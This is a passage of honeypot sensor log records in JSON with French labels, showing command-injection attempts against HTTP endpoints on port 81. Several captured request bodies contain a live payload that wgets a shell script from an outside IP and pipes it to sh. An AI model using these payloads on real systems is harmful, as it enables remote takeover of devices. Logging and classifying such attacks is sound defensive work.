lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022c84e403f8f0c112c37601f90e6b428a6\u0022, \u0022path_pattern_hash\u0022: \u002299cd8034277f5314e823702dbb3ebc6d\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json\\r\\nContent-Length: 176\\r\\nConnectio\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/api\/tunnel\/tailscale-install\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json\\r\\nContent-Length: 176\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022cmd\\\u0022:\\\u0022`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s 9router;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh \u0022, \u0022payload_snippet\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json\\r\\nContent-Length: 176\\r\\nConnectio\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/api\/tunnel\/tailscale-install\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json\\r\\nContent-Length: 176\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022cmd\\\u0022:\\\u0022`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s 9router;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh \u0022, \u0022payload_snippet\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json\\r\\nContent-Length: 176\\r\\nConnectio\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022a51e587f819f2c58e6fe4bd4c551cc572da12a40\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/api\/tunnel\/tailscale-install\u0022, \u0022request_line\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json\\r\\nContent-Length: 176\\r\\nConnectio\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/api\/tunnel\/tailscale-install\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/api\/tunnel\/tailscale-install\u0022, \u0022request_line\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/api\/tunnel\/tailscale-install\u0022, \u0022evidence_snippet\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json\\r\\nContent-Length: 176\\r\\nConnectio\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022, \u0022http_cmd_injection\u0022, \u0022http_idor_probe\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022, \u0022http_cmd_injection\u0022, \u0022http_idor_probe\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":316},{"id":11860770,"ip":"45.156.87.213","ts":"2026-07-14 08:22:34.000000","proto":"tcp","src_port":59922,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":51,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022]","http_method":"POST","http_target":"\/api\/network\/settings","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 3, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00223f75be5a16a5bdf34f0b9aa0d9023c8d52bbfb9a\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 315, \u0022payload_entropy\u0022: 5.131967304049073, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00222d4dce37c5f6688aa6e5ffda2ef0c69f991d8c7e\u0022, \u0022event_fingerprint\u0022: \u0022157a5b131f1c746607d709c0114088d1cb1c7728\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022852e75d7d4fe95bda02302fa1c86efbf\u0022, \u0022path_pattern_hash\u0022: \u00222b198f042c4b9cbc886c5fadc737cd96\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 166\\r\\n\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/api\/network\/settings\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 166\\r\\nConnection: close\\r\\n\\r\\nhostname=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s russ;busybox wget http:\/\/91.92.40.118\/wget.sh \u0022, \u0022payload_snippet\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 166\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/api\/network\/settings\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 166\\r\\nConnection: close\\r\\n\\r\\nhostname=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s russ;busybox wget http:\/\/91.92.40.118\/wget.sh \u0022, \u0022payload_snippet\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 166\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022ffd016bd1f164396736d3328b545b9303c2300b7\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/api\/network\/settings\u0022, \u0022request_line\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 166\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/api\/network\/settings\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/api\/network\/settings\u0022, \u0022request_line\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/api\/network\/settings\u0022, \u0022evidence_snippet\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 166\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022, \u0022http_cmd_injection\u0022, \u0022http_idor_probe\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, 